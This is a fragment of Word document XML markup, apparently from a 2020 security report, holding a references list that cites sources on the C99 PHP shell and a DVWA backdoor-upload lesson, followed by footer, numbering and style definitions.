          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="20" w:name="_Toc41839641" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="-514000268"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Bibliographies"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w14:paraId="2B3A77D3" w14:textId="4B89632F" w:rsidR="0017443B" w:rsidRDefault="0017443B">
          <w:pPr>
            <w:pStyle w:val="Heading1"/>
          </w:pPr>
          <w:r>
            <w:t>References</w:t>
          </w:r>
          <w:bookmarkEnd w:id="20"/>
        </w:p>
        <w:sdt>
          <w:sdtPr>
            <w:id w:val="-573587230"/>
            <w:bibliography/>
          </w:sdtPr>
          <w:sdtEndPr/>
          <w:sdtContent>
            <w:p w14:paraId="0BCD4DB3" w14:textId="77777777" w:rsidR="00726E44" w:rsidRDefault="00726E44" w:rsidP="0060408A">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:ind w:left="720"/>
              </w:pPr>
            </w:p>
            <w:p w14:paraId="74508BC8" w14:textId="77777777" w:rsidR="00474588" w:rsidRDefault="0017443B" w:rsidP="00474588">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r>
                <w:instrText xml:space="preserve"> BIBLIOGRAPHY </w:instrText>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="00474588">
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Keane, J. C. (2001, November 30). </w:t>
              </w:r>
              <w:r w:rsidR="00474588">
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>PHP Malware C99 Shell</w:t>
              </w:r>
              <w:r w:rsidR="00474588">
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>. Retrieved from madirish.net: http://www.madirish.net/241</w:t>
              </w:r>
            </w:p>
            <w:p w14:paraId="510F7C94" w14:textId="77777777" w:rsidR="00474588" w:rsidRDefault="00474588" w:rsidP="00474588">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Student, C. S. (2013, February 27). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Damn Vulnerable Web App (DVWA): Lesson 14 - Upload and use C99.php Backdoor shell.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> Retrieved from computersecuritystudent: https://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson14/index.html</w:t>
              </w:r>
            </w:p>
            <w:p w14:paraId="7D13A40E" w14:textId="5CB0023C" w:rsidR="0017443B" w:rsidRDefault="0017443B" w:rsidP="00474588">
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="117E8BAD" w14:textId="757882AF" w:rsidR="00F73268" w:rsidRDefault="00F73268" w:rsidP="0017443B"/>
    <w:sectPr w:rsidR="00F73268" w:rsidSect="00C742A4">
      <w:headerReference w:type="default" r:id="rId40"/>
      <w:footerReference w:type="default" r:id="rId4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B8B2D7" w14:textId="77777777" w:rsidR="00C9043B" w:rsidRDefault="00C9043B" w:rsidP="00623A97">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2972F0E0" w14:textId="77777777" w:rsidR="00C9043B" w:rsidRDefault="00C9043B" w:rsidP="00623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haroni">
    <w:altName w:val="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85763"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="7978DA7B" w14:textId="0C7DC779" w:rsidR="00450739" w:rsidRDefault="00450739" w:rsidP="00C742A4">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:ind w:firstLine="2160"/>
          <w:jc w:val="center"/>
        </w:pPr>
        <w:r w:rsidRPr="00976B56">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t xml:space="preserve">Copyright © 2020 </w:t>
        </w:r>
        <w:r w:rsidR="00507D2B">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Wilson</w:t>
        </w:r>
        <w:r w:rsidRPr="00976B56">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t xml:space="preserve"> Security Services. All rights reserved.</w:t>
        </w:r>
        <w:r>
          <w:tab/>
          <w:t xml:space="preserve">   </w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:t>1</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="4944C2D9" w14:textId="32B91318" w:rsidR="00450739" w:rsidRPr="00C742A4" w:rsidRDefault="00450739" w:rsidP="00C74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C424B" w14:textId="77777777" w:rsidR="00C9043B" w:rsidRDefault="00C9043B" w:rsidP="00623A97">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6140CD75" w14:textId="77777777" w:rsidR="00C9043B" w:rsidRDefault="00C9043B" w:rsidP="00623A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0A9E5" w14:textId="2313571D" w:rsidR="0017443B" w:rsidRDefault="0017443B">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="3801A9B6" w14:textId="32D86B1B" w:rsidR="0017443B" w:rsidRDefault="0017443B">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="3391C94B" w14:textId="77777777" w:rsidR="0017443B" w:rsidRDefault="001744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B48F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DA92A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7B75A8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="03B4765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EDE0EE6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="83A86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8C31AB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6A9C6F4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5654449"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D36EA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FA4E8E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="943672C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F265C37"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ADFC29B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3DB7A33"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="40987BF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cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0C090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="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cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0C090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="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DD81A20"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EEA26BF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1"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="2"/>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53C"/>
    <w:rsid w:val="00000BC6"/>
    <w:rsid w:val="00014251"/>
    <w:rsid w:val="00021053"/>
    <w:rsid w:val="000218FA"/>
    <w:rsid w:val="00021FAC"/>
    <w:rsid w:val="00025910"/>
    <w:rsid w:val="000420CA"/>
    <w:rsid w:val="00050B25"/>
    <w:rsid w:val="000519D4"/>
    <w:rsid w:val="000622C2"/>
    <w:rsid w:val="00064F9A"/>
    <w:rsid w:val="00077ABE"/>
    <w:rsid w:val="0008250A"/>
    <w:rsid w:val="000905BB"/>
    <w:rsid w:val="000A25AE"/>
    <w:rsid w:val="000A38F1"/>
    <w:rsid w:val="000B08D5"/>
    <w:rsid w:val="000B2355"/>
    <w:rsid w:val="000B60F7"/>
    <w:rsid w:val="000B685B"/>
    <w:rsid w:val="000C6027"/>
    <w:rsid w:val="000E6B8B"/>
    <w:rsid w:val="0010242F"/>
    <w:rsid w:val="00104FA4"/>
    <w:rsid w:val="00107838"/>
    <w:rsid w:val="00117D28"/>
    <w:rsid w:val="00127722"/>
    <w:rsid w:val="00132A04"/>
    <w:rsid w:val="0014092A"/>
    <w:rsid w:val="001440AD"/>
    <w:rsid w:val="00146A6F"/>
    <w:rsid w:val="00150AA9"/>
    <w:rsid w:val="00150AC0"/>
    <w:rsid w:val="0015519F"/>
    <w:rsid w:val="00157F4B"/>
    <w:rsid w:val="001623CD"/>
    <w:rsid w:val="00171B04"/>
    <w:rsid w:val="00172D0E"/>
    <w:rsid w:val="0017443B"/>
    <w:rsid w:val="001841CD"/>
    <w:rsid w:val="00184368"/>
    <w:rsid w:val="00184F27"/>
    <w:rsid w:val="00192612"/>
    <w:rsid w:val="001A2BC5"/>
    <w:rsid w:val="001A4F98"/>
    <w:rsid w:val="001A520C"/>
    <w:rsid w:val="001C6032"/>
    <w:rsid w:val="001D2D21"/>
    <w:rsid w:val="001D4C87"/>
    <w:rsid w:val="001D5EDE"/>
    <w:rsid w:val="001E0A68"/>
    <w:rsid w:val="00204A69"/>
    <w:rsid w:val="00205C9B"/>
    <w:rsid w:val="00207E67"/>
    <w:rsid w:val="00213E5D"/>
    <w:rsid w:val="002170B6"/>
    <w:rsid w:val="0022111D"/>
    <w:rsid w:val="00226CD4"/>
    <w:rsid w:val="00237576"/>
    <w:rsid w:val="00244F1F"/>
    <w:rsid w:val="00253A82"/>
    <w:rsid w:val="00261AC4"/>
    <w:rsid w:val="002625F5"/>
    <w:rsid w:val="00270296"/>
    <w:rsid w:val="002709DE"/>
    <w:rsid w:val="0027516E"/>
    <w:rsid w:val="0028153C"/>
    <w:rsid w:val="00284020"/>
    <w:rsid w:val="0028451B"/>
    <w:rsid w:val="00287C76"/>
    <w:rsid w:val="0029078F"/>
    <w:rsid w:val="00291F0D"/>
    <w:rsid w:val="00296354"/>
    <w:rsid w:val="002A6095"/>
    <w:rsid w:val="002A70C2"/>
    <w:rsid w:val="002B240E"/>
    <w:rsid w:val="002B616E"/>
    <w:rsid w:val="002B69EA"/>
    <w:rsid w:val="002B710F"/>
    <w:rsid w:val="002C6F09"/>
    <w:rsid w:val="002D0805"/>
    <w:rsid w:val="002D1981"/>
    <w:rsid w:val="002D64DA"/>
    <w:rsid w:val="002D6958"/>
    <w:rsid w:val="002E184E"/>
    <w:rsid w:val="002E563C"/>
    <w:rsid w:val="00301E09"/>
    <w:rsid w:val="00310674"/>
    <w:rsid w:val="00312AFB"/>
    <w:rsid w:val="0031671C"/>
    <w:rsid w:val="00317EDC"/>
    <w:rsid w:val="00323960"/>
    <w:rsid w:val="00325BE2"/>
    <w:rsid w:val="003263C4"/>
    <w:rsid w:val="00332794"/>
    <w:rsid w:val="00334979"/>
    <w:rsid w:val="003351F3"/>
    <w:rsid w:val="00356817"/>
    <w:rsid w:val="003600D2"/>
    <w:rsid w:val="00367E80"/>
    <w:rsid w:val="00374C1C"/>
    <w:rsid w:val="00375B01"/>
    <w:rsid w:val="00376E89"/>
    <w:rsid w:val="00380E6B"/>
    <w:rsid w:val="0038323A"/>
    <w:rsid w:val="0038760A"/>
    <w:rsid w:val="00387E53"/>
    <w:rsid w:val="003948E3"/>
    <w:rsid w:val="003A4980"/>
    <w:rsid w:val="003B5E91"/>
    <w:rsid w:val="003C5C77"/>
    <w:rsid w:val="003D3394"/>
    <w:rsid w:val="003E57A7"/>
    <w:rsid w:val="00401995"/>
    <w:rsid w:val="004113C4"/>
    <w:rsid w:val="0041326D"/>
    <w:rsid w:val="00415BA5"/>
    <w:rsid w:val="00421C63"/>
    <w:rsid w:val="00422394"/>
    <w:rsid w:val="00424436"/>
    <w:rsid w:val="0043069C"/>
    <w:rsid w:val="004324B4"/>
    <w:rsid w:val="004341A2"/>
    <w:rsid w:val="00437F80"/>
    <w:rsid w:val="0044137B"/>
    <w:rsid w:val="00450739"/>
    <w:rsid w:val="00453C00"/>
    <w:rsid w:val="0046358A"/>
    <w:rsid w:val="00464F32"/>
    <w:rsid w:val="00474588"/>
    <w:rsid w:val="00481529"/>
    <w:rsid w:val="00481BC8"/>
    <w:rsid w:val="00484179"/>
    <w:rsid w:val="00495F31"/>
    <w:rsid w:val="00497A7D"/>
    <w:rsid w:val="004B4AFF"/>
    <w:rsid w:val="004C1970"/>
    <w:rsid w:val="004D1952"/>
    <w:rsid w:val="004D4404"/>
    <w:rsid w:val="004D65A1"/>
    <w:rsid w:val="004E5DD6"/>
    <w:rsid w:val="004F68F6"/>
    <w:rsid w:val="004F7B2F"/>
    <w:rsid w:val="00501067"/>
    <w:rsid w:val="00503757"/>
    <w:rsid w:val="00505643"/>
    <w:rsid w:val="00507D2B"/>
    <w:rsid w:val="00523950"/>
    <w:rsid w:val="005263C7"/>
    <w:rsid w:val="00527091"/>
    <w:rsid w:val="00527753"/>
    <w:rsid w:val="00530620"/>
    <w:rsid w:val="00533E41"/>
    <w:rsid w:val="00535097"/>
    <w:rsid w:val="00543A93"/>
    <w:rsid w:val="0054548C"/>
    <w:rsid w:val="005454DD"/>
    <w:rsid w:val="00547D43"/>
    <w:rsid w:val="00552360"/>
    <w:rsid w:val="0055346C"/>
    <w:rsid w:val="0056491B"/>
    <w:rsid w:val="00573588"/>
    <w:rsid w:val="00573F11"/>
    <w:rsid w:val="00580981"/>
    <w:rsid w:val="005809DB"/>
    <w:rsid w:val="005850FD"/>
    <w:rsid w:val="00596170"/>
    <w:rsid w:val="005A5C2B"/>
    <w:rsid w:val="005B2575"/>
    <w:rsid w:val="005B52A0"/>
    <w:rsid w:val="005B5B0B"/>
    <w:rsid w:val="005D6E63"/>
    <w:rsid w:val="005E3247"/>
    <w:rsid w:val="005F153B"/>
    <w:rsid w:val="005F2DED"/>
    <w:rsid w:val="00602428"/>
    <w:rsid w:val="0060408A"/>
    <w:rsid w:val="00605856"/>
    <w:rsid w:val="00606750"/>
    <w:rsid w:val="00613DD4"/>
    <w:rsid w:val="00616757"/>
    <w:rsid w:val="00623A97"/>
    <w:rsid w:val="00624B83"/>
    <w:rsid w:val="006345EE"/>
    <w:rsid w:val="00640472"/>
    <w:rsid w:val="006444B7"/>
    <w:rsid w:val="00644C37"/>
    <w:rsid w:val="00663802"/>
    <w:rsid w:val="006749E6"/>
    <w:rsid w:val="00681CBF"/>
    <w:rsid w:val="006879AB"/>
    <w:rsid w:val="006949FF"/>
    <w:rsid w:val="00695363"/>
    <w:rsid w:val="00697356"/>
    <w:rsid w:val="006A3099"/>
    <w:rsid w:val="006A7695"/>
    <w:rsid w:val="006B190C"/>
    <w:rsid w:val="006B4B73"/>
    <w:rsid w:val="006C5D05"/>
    <w:rsid w:val="006C7073"/>
    <w:rsid w:val="006C7A23"/>
    <w:rsid w:val="006D021D"/>
    <w:rsid w:val="006D4A7E"/>
    <w:rsid w:val="006E00C7"/>
    <w:rsid w:val="006E0274"/>
    <w:rsid w:val="006E3471"/>
    <w:rsid w:val="006E5D62"/>
    <w:rsid w:val="006F0447"/>
    <w:rsid w:val="006F2482"/>
    <w:rsid w:val="006F24E8"/>
    <w:rsid w:val="00700E82"/>
    <w:rsid w:val="007056CB"/>
    <w:rsid w:val="007132A8"/>
    <w:rsid w:val="0072266C"/>
    <w:rsid w:val="00722C56"/>
    <w:rsid w:val="00726E44"/>
    <w:rsid w:val="00732229"/>
    <w:rsid w:val="007347E9"/>
    <w:rsid w:val="007416FF"/>
    <w:rsid w:val="00743233"/>
    <w:rsid w:val="00744097"/>
    <w:rsid w:val="0074572F"/>
    <w:rsid w:val="0075093C"/>
    <w:rsid w:val="0075332A"/>
    <w:rsid w:val="007732A8"/>
    <w:rsid w:val="00784336"/>
    <w:rsid w:val="007A3DF3"/>
    <w:rsid w:val="007B55C0"/>
    <w:rsid w:val="007C38BD"/>
    <w:rsid w:val="007D4B11"/>
    <w:rsid w:val="007D4F76"/>
    <w:rsid w:val="007E2224"/>
    <w:rsid w:val="007F1658"/>
    <w:rsid w:val="007F208C"/>
    <w:rsid w:val="007F2D1D"/>
    <w:rsid w:val="0080183C"/>
    <w:rsid w:val="00812A0E"/>
    <w:rsid w:val="00814848"/>
    <w:rsid w:val="00816961"/>
    <w:rsid w:val="00821CAD"/>
    <w:rsid w:val="00827945"/>
    <w:rsid w:val="0083047E"/>
    <w:rsid w:val="00832270"/>
    <w:rsid w:val="008458F1"/>
    <w:rsid w:val="008459D2"/>
    <w:rsid w:val="00851682"/>
    <w:rsid w:val="0085752B"/>
    <w:rsid w:val="00862519"/>
    <w:rsid w:val="00866855"/>
    <w:rsid w:val="00870AF3"/>
    <w:rsid w:val="00872CBD"/>
    <w:rsid w:val="00875109"/>
    <w:rsid w:val="00896EA8"/>
    <w:rsid w:val="0089746A"/>
    <w:rsid w:val="008A536F"/>
    <w:rsid w:val="008B38A9"/>
    <w:rsid w:val="008D0EC7"/>
    <w:rsid w:val="008D2018"/>
    <w:rsid w:val="008E1E50"/>
    <w:rsid w:val="008E299B"/>
    <w:rsid w:val="008F4639"/>
    <w:rsid w:val="008F78AA"/>
    <w:rsid w:val="009025BD"/>
    <w:rsid w:val="00912D59"/>
    <w:rsid w:val="0092189D"/>
    <w:rsid w:val="00923A12"/>
    <w:rsid w:val="00953022"/>
    <w:rsid w:val="00957DD2"/>
    <w:rsid w:val="009648DA"/>
    <w:rsid w:val="009829D9"/>
    <w:rsid w:val="009841B1"/>
    <w:rsid w:val="00990981"/>
    <w:rsid w:val="00995BE9"/>
    <w:rsid w:val="009A51B9"/>
    <w:rsid w:val="009A6BC2"/>
    <w:rsid w:val="009B3747"/>
    <w:rsid w:val="009B41D3"/>
    <w:rsid w:val="009B4C01"/>
    <w:rsid w:val="009C1AE9"/>
    <w:rsid w:val="009C28F6"/>
    <w:rsid w:val="009C5A17"/>
    <w:rsid w:val="009D6B52"/>
    <w:rsid w:val="009D7890"/>
    <w:rsid w:val="009E48A0"/>
    <w:rsid w:val="009E574D"/>
    <w:rsid w:val="009F015D"/>
    <w:rsid w:val="009F021E"/>
    <w:rsid w:val="009F63E5"/>
    <w:rsid w:val="009F7473"/>
    <w:rsid w:val="009F7A61"/>
    <w:rsid w:val="00A01EFC"/>
    <w:rsid w:val="00A0656A"/>
    <w:rsid w:val="00A1072E"/>
    <w:rsid w:val="00A13182"/>
    <w:rsid w:val="00A2286A"/>
    <w:rsid w:val="00A23576"/>
    <w:rsid w:val="00A23C93"/>
    <w:rsid w:val="00A30A30"/>
    <w:rsid w:val="00A310FD"/>
    <w:rsid w:val="00A347D5"/>
    <w:rsid w:val="00A34A40"/>
    <w:rsid w:val="00A35F94"/>
    <w:rsid w:val="00A36B21"/>
    <w:rsid w:val="00A4007D"/>
    <w:rsid w:val="00A412EE"/>
    <w:rsid w:val="00A4174F"/>
    <w:rsid w:val="00A46319"/>
    <w:rsid w:val="00A470C5"/>
    <w:rsid w:val="00A575F3"/>
    <w:rsid w:val="00A63075"/>
    <w:rsid w:val="00A729AF"/>
    <w:rsid w:val="00A86BCA"/>
    <w:rsid w:val="00A904FE"/>
    <w:rsid w:val="00A9627C"/>
    <w:rsid w:val="00AA46B6"/>
    <w:rsid w:val="00AA7E51"/>
    <w:rsid w:val="00AB6FAF"/>
    <w:rsid w:val="00AC1757"/>
    <w:rsid w:val="00AC1EF0"/>
    <w:rsid w:val="00AD1E55"/>
    <w:rsid w:val="00AD306F"/>
    <w:rsid w:val="00AE442F"/>
    <w:rsid w:val="00AE4DD3"/>
    <w:rsid w:val="00AE5013"/>
    <w:rsid w:val="00AF5178"/>
    <w:rsid w:val="00AF5BE7"/>
    <w:rsid w:val="00AF7331"/>
    <w:rsid w:val="00B05008"/>
    <w:rsid w:val="00B13DA6"/>
    <w:rsid w:val="00B363DF"/>
    <w:rsid w:val="00B372B0"/>
    <w:rsid w:val="00B4517E"/>
    <w:rsid w:val="00B46993"/>
    <w:rsid w:val="00B57752"/>
    <w:rsid w:val="00B64AEC"/>
    <w:rsid w:val="00B65727"/>
    <w:rsid w:val="00B66663"/>
    <w:rsid w:val="00B672A2"/>
    <w:rsid w:val="00B74373"/>
    <w:rsid w:val="00B9472D"/>
    <w:rsid w:val="00BA1152"/>
    <w:rsid w:val="00BA2B4A"/>
    <w:rsid w:val="00BA3485"/>
    <w:rsid w:val="00BA4A82"/>
    <w:rsid w:val="00BA4DE4"/>
    <w:rsid w:val="00BB04C8"/>
    <w:rsid w:val="00BB4E17"/>
    <w:rsid w:val="00BB6CB9"/>
    <w:rsid w:val="00BC1472"/>
    <w:rsid w:val="00BC2B63"/>
    <w:rsid w:val="00BC49A6"/>
    <w:rsid w:val="00BD070F"/>
    <w:rsid w:val="00BD2FEE"/>
    <w:rsid w:val="00BD7E9F"/>
    <w:rsid w:val="00BF245C"/>
    <w:rsid w:val="00BF7A68"/>
    <w:rsid w:val="00C00E67"/>
    <w:rsid w:val="00C10ADF"/>
    <w:rsid w:val="00C12B20"/>
    <w:rsid w:val="00C16974"/>
    <w:rsid w:val="00C33889"/>
    <w:rsid w:val="00C33DA3"/>
    <w:rsid w:val="00C40B2B"/>
    <w:rsid w:val="00C50107"/>
    <w:rsid w:val="00C5190F"/>
    <w:rsid w:val="00C5296F"/>
    <w:rsid w:val="00C5374D"/>
    <w:rsid w:val="00C56ED8"/>
    <w:rsid w:val="00C57795"/>
    <w:rsid w:val="00C63215"/>
    <w:rsid w:val="00C742A4"/>
    <w:rsid w:val="00C9043B"/>
    <w:rsid w:val="00C93B99"/>
    <w:rsid w:val="00C95FAA"/>
    <w:rsid w:val="00CA34A7"/>
    <w:rsid w:val="00CA582F"/>
    <w:rsid w:val="00CA67DF"/>
    <w:rsid w:val="00CC2A7D"/>
    <w:rsid w:val="00CC3072"/>
    <w:rsid w:val="00CC3E85"/>
    <w:rsid w:val="00CD10AB"/>
    <w:rsid w:val="00CD4739"/>
    <w:rsid w:val="00CD69FC"/>
    <w:rsid w:val="00CE3704"/>
    <w:rsid w:val="00CE57F8"/>
    <w:rsid w:val="00D038E9"/>
    <w:rsid w:val="00D078D9"/>
    <w:rsid w:val="00D134BB"/>
    <w:rsid w:val="00D218EC"/>
    <w:rsid w:val="00D222F7"/>
    <w:rsid w:val="00D2666F"/>
    <w:rsid w:val="00D31D3F"/>
    <w:rsid w:val="00D359D3"/>
    <w:rsid w:val="00D45469"/>
    <w:rsid w:val="00D52781"/>
    <w:rsid w:val="00D53AA3"/>
    <w:rsid w:val="00D53FD9"/>
    <w:rsid w:val="00D5492F"/>
    <w:rsid w:val="00D606C0"/>
    <w:rsid w:val="00D74A17"/>
    <w:rsid w:val="00D76D63"/>
    <w:rsid w:val="00D847B7"/>
    <w:rsid w:val="00D95EDB"/>
    <w:rsid w:val="00D96A54"/>
    <w:rsid w:val="00DA008D"/>
    <w:rsid w:val="00DA7100"/>
    <w:rsid w:val="00DB149B"/>
    <w:rsid w:val="00DB7F15"/>
    <w:rsid w:val="00DC573E"/>
    <w:rsid w:val="00DD0746"/>
    <w:rsid w:val="00DD5D2E"/>
    <w:rsid w:val="00DE1970"/>
    <w:rsid w:val="00E00F07"/>
    <w:rsid w:val="00E02379"/>
    <w:rsid w:val="00E06877"/>
    <w:rsid w:val="00E14157"/>
    <w:rsid w:val="00E141A6"/>
    <w:rsid w:val="00E17E79"/>
    <w:rsid w:val="00E23499"/>
    <w:rsid w:val="00E2747D"/>
    <w:rsid w:val="00E32DAC"/>
    <w:rsid w:val="00E353CE"/>
    <w:rsid w:val="00E4161D"/>
    <w:rsid w:val="00E44E6C"/>
    <w:rsid w:val="00E464EE"/>
    <w:rsid w:val="00E50AB1"/>
    <w:rsid w:val="00E574A9"/>
    <w:rsid w:val="00E62E60"/>
    <w:rsid w:val="00E63662"/>
    <w:rsid w:val="00E66A53"/>
    <w:rsid w:val="00E9045C"/>
    <w:rsid w:val="00E95B70"/>
    <w:rsid w:val="00E961AF"/>
    <w:rsid w:val="00E961CD"/>
    <w:rsid w:val="00EC2FF5"/>
    <w:rsid w:val="00ED7FBA"/>
    <w:rsid w:val="00EE5F7D"/>
    <w:rsid w:val="00EF235A"/>
    <w:rsid w:val="00EF7523"/>
    <w:rsid w:val="00F00AD8"/>
    <w:rsid w:val="00F041C9"/>
    <w:rsid w:val="00F04F51"/>
    <w:rsid w:val="00F118A1"/>
    <w:rsid w:val="00F12A39"/>
    <w:rsid w:val="00F13DE0"/>
    <w:rsid w:val="00F202FB"/>
    <w:rsid w:val="00F2351F"/>
    <w:rsid w:val="00F25728"/>
    <w:rsid w:val="00F2786E"/>
    <w:rsid w:val="00F31ACD"/>
    <w:rsid w:val="00F3697C"/>
    <w:rsid w:val="00F40BAE"/>
    <w:rsid w:val="00F4585E"/>
    <w:rsid w:val="00F60B3A"/>
    <w:rsid w:val="00F72981"/>
    <w:rsid w:val="00F73268"/>
    <w:rsid w:val="00F749CC"/>
    <w:rsid w:val="00F75904"/>
    <w:rsid w:val="00F8791D"/>
    <w:rsid w:val="00FA437C"/>
    <w:rsid w:val="00FA71A9"/>
    <w:rsid w:val="00FA7591"/>
    <w:rsid w:val="00FB1D47"/>
    <w:rsid w:val="00FB2A02"/>
    <w:rsid w:val="00FC565A"/>
    <w:rsid w:val="00FD0B83"/>
    <w:rsid w:val="00FE3967"/>
    <w:rsid w:val="00FE711F"/>
    <w:rsid w:val="00FF5A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3780B0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5B7A18F7-E1D5-43B3-9D03-4BDAFED56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53C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="000B2355"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="0"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambr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B2355"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambr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2355"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
